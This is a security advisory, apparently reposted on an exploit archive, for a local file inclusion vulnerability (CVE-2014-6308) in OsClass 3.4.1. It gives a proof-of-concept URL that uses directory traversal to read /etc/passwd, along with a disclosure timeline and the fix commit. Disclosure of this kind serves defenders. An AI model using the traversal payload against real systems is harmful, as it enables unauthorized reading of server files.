Exploit for php platform in category web applications
Information
-----------
Advisory by Netsparker.
Name : LFI Vulnerability in OsClass
Affected Software : OsClass
Affected Versions: 3.4.1 and possibly below
Vendor Homepage : http://osclass.org/
Vulnerability Type : Local File Inclusion
Severity : Critical
CVE-ID: CVE-2014-6308
Netsparker Advisory Reference : NS-14-031
Advisory URL
------------
https://www.netsparker.com/lfi-vulnerability-in-osclass/
Description
-----------
Local file inclusion vulnerability where discovered in Osclass, an
open source project that allows you to create a classifieds sites.
Technical Details
-----------------
Proof of Concept URL for LFI in OsClass:
http://example.com/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd
Advisory Timeline
-----------------
03/09/2014 - First Contact
03/09/2014 - Vulnerability fixed:
https://github.com/osclass/Osclass/commit/c163bf5910d0d36424d7fc678da6b03a0e443435
15/09/2014 - Fix released publicly in Osclass 3.4.2
Credits & Authors
-----------------
These issues have been discovered by Omar Kurt while testing
Netsparker Web Application Security Scanner.
# 0day.today [2018-03-20] #